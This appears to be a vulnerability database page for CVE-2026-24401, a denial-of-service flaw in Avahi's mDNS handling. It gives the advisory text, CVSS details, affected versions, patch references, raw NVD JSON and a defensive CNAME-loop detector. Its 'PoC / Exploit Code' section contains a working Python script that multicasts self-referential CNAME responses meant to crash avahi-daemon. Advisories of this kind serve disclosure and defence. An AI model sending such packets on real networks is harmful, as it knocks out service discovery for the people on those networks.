Security Vulnerability Report
CVE-2026-24401 CVSS 6.5 MEDIUM

CVE-2026-24401

Published: 2026-01-24 02:15:49
Last Modified: 2026-02-12 15:58:27

Description

Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions 0.9rc2 and below, avahi-daemon can be crashed via a segmentation fault by sending an unsolicited mDNS response containing a recursive CNAME record, where the alias and canonical name point to the same domain (e.g., "h.local" as a CNAME for "h.local"). This causes unbounded recursion in the lookup_handle_cname function, leading to stack exhaustion. The vulnerability affects record browsers where AVAHI_LOOKUP_USE_MULTICAST is set explicitly, which includes record browsers created by resolvers used by nss-mdns. This issue is patched in commit 78eab31128479f06e30beb8c1cbf99dd921e2524.
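A defensive check for the condition described above, as an added example that is not part of the advisory or the Avahi code base: it follows CNAME answers from decoded capture records iteratively, with a visited list and a hop bound, and flags the self-referential case. Going beyond the single-record case in the description, it also flags longer alias loops. The record tuples, the addresses and `MAX_CNAME_HOPS` are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample: decoded mDNS answer records (source IP, owner, type, rdata),
# e.g. as exported from a packet capture. Addresses are documentation-range values.
SAMPLE_RECORDS = [
    ("192.0.2.10", "printer.local.", "A", "192.0.2.20"),
    ("192.0.2.10", "www.local", "CNAME", "printer.local"),
    ("192.0.2.66", "h.local", "CNAME", "H.local."),   # alias == canonical name
    ("192.0.2.77", "a.local", "CNAME", "b.local"),
    ("192.0.2.77", "b.local", "CNAME", "a.local"),    # two-record loop
]

MAX_CNAME_HOPS = 16  # assumed bound for this example, not a value from Avahi


def normalize(name):
    """DNS names compare case-insensitively; drop the optional trailing dot."""
    return name.rstrip(".").lower()


def find_cname_loops(records, max_hops=MAX_CNAME_HOPS):
    """Return sorted (source_ip, [names in loop]) for every sender whose CNAME
    answers form a cycle or reach max_hops when followed (checked per sender)."""
    by_source = defaultdict(dict)
    for src, owner, rtype, rdata in records:
        if rtype.upper() == "CNAME":
            by_source[src][normalize(owner)] = normalize(rdata)

    findings = set()
    for src, aliases in by_source.items():
        for start in aliases:
            seen, name = [], start
            # Iterative walk with a visited list: no recursion, bounded work.
            while name in aliases and name not in seen and len(seen) < max_hops:
                seen.append(name)
                name = aliases[name]
            if name in seen or len(seen) >= max_hops:
                loop = seen[seen.index(name):] if name in seen else seen
                findings.add((src, tuple(sorted(loop))))
    return sorted((src, list(loop)) for src, loop in findings)


if __name__ == "__main__":
    for src, loop in find_cname_loops(SAMPLE_RECORDS):
        print(f"CNAME loop from {src}: {' -> '.join(loop)}")
```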

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:avahi:avahi:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:avahi:avahi:0.9:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:avahi:avahi:0.9:rc2:*:*:*:*:*:* - VULNERABLE
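All Avahi versions 0.9rc2 and below
Avahi 0.8 and earlier (presumed)
Default installations of Linux distributions that use Avahi (Debian, Ubuntu, Fedora, RHEL, CentOS, etc.)
Configurations that use nss-mdns together with Avahi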

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct
import time

# mDNS constants
MDNS_MULTICAST_IP = "224.0.0.251"
MDNS_PORT = 5353


def create_mdns_header(transaction_id):
    """Create mDNS header"""
    return struct.pack('>HHHH', transaction_id, 0x8400, 1, 0)


def create_cname_record(name):
    """Create a CNAME record that points to itself (recursive CNAME)"""
    name_bytes = b''
    for part in name.split('.'):
        name_bytes += struct.pack('B', len(part)) + part.encode()
    name_bytes += b'\x00'  # Null terminator
    # CNAME record: name + type(CNAME=5) + class(IN=1) + ttl + rdlength + rdata
    return name_bytes + struct.pack('>HHIH', 5, 0x0001, 300, len(name_bytes)) + name_bytes


def send_malicious_mdns_response(target_ip, recursive_cname):
    """
    Send malicious mDNS response with recursive CNAME record
    to trigger CVE-2026-24401
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.settimeout(5)

    transaction_id = 0x1234
    header = create_mdns_header(transaction_id)

    # Questions section (empty for response)
    questions = b''

    # Answers section with recursive CNAME
    answers = create_cname_record(recursive_cname)

    # Additional records section (optional)
    additional = b''

    dns_packet = header + questions + answers + additional

    # Send to mDNS multicast address
    sock.sendto(dns_packet, (MDNS_MULTICAST_IP, MDNS_PORT))
    print(f"[+] Sent malicious mDNS response with recursive CNAME: {recursive_cname}")
    print(f"[+] Packet size: {len(dns_packet)} bytes")
    sock.close()


if __name__ == "__main__":
    print("CVE-2026-24401 PoC - Avahi recursive CNAME DoS")
    print("=" * 50)

    # Target: any local hostname that will be queried
    target_hostname = "h.local"

    # Send multiple packets to increase likelihood of triggering the bug
    for i in range(5):
        send_malicious_mdns_response(MDNS_MULTICAST_IP, target_hostname)
        time.sleep(0.1)

    print("[+] Attack completed. Target avahi-daemon should crash.")
```

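References

https://github.com/avahi/avahi/commit/78eab31128479f06e30beb8c1cbf99dd921e2524 (Patch)
https://github.com/avahi/avahi/issues/501 (Issue Tracking, Patch)
https://github.com/avahi/avahi/security/advisories/GHSA-h4vp-5m8j-f6w3 (Vendor Advisory)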

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24401", "sourceIdentifier": "[email protected]", "published": "2026-01-24T02:15:48.760", "lastModified": "2026-02-12T15:58:27.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions 0.9rc2 and below, avahi-daemon can be crashed via a segmentation fault by sending an unsolicited mDNS response containing a recursive CNAME record, where the alias and canonical name point to the same domain (e.g., \"h.local\" as a CNAME for \"h.local\"). This causes unbounded recursion in the lookup_handle_cname function, leading to stack exhaustion. The vulnerability affects record browsers where AVAHI_LOOKUP_USE_MULTICAST is set explicitly, which includes record browsers created by resolvers used by nss-mdns. This issue is patched in commit 78eab31128479f06e30beb8c1cbf99dd921e2524."}, {"lang": "es", "value": "Avahi es un sistema que facilita el descubrimiento de servicios en una red local a través de la suite de protocolos mDNS/DNS-SD. En las versiones 0.9rc2 e inferiores, avahi-daemon puede ser bloqueado mediante un fallo de segmentación al enviar una respuesta mDNS no solicitada que contenga un registro CNAME recursivo, donde el alias y el nombre canónico apuntan al mismo dominio (por ejemplo, 'h.local' como CNAME para 'h.local'). Esto causa una recursión ilimitada en la función lookup_handle_cname, lo que lleva al agotamiento de la pila. La vulnerabilidad afecta a los navegadores de registros donde AVAHI_LOOKUP_USE_MULTICAST está configurado explícitamente, lo que incluye los navegadores de registros creados por los resolvedores utilizados por nss-mdns. 
Este problema está parcheado en el commit 78eab31128479f06e30beb8c1cbf99dd921e2524."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9", "matchCriteriaId": "6481267F-934F-4A0C-9B25-59738E798458"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc1:*:*:*:*:*:*", "matchCriteriaId": "76971590-AEED-4CB1-B7B7-45EA8FD11524"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc2:*:*:*:*:*:*", "matchCriteriaId": "83D94AE4-46AC-4955-BB0D-193CF79149A1"}]}]}], "references": [{"url": "https://github.com/avahi/avahi/commit/78eab31128479f06e30beb8c1cbf99dd921e2524", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/avahi/avahi/issues/501", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": 
"https://github.com/avahi/avahi/security/advisories/GHSA-h4vp-5m8j-f6w3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}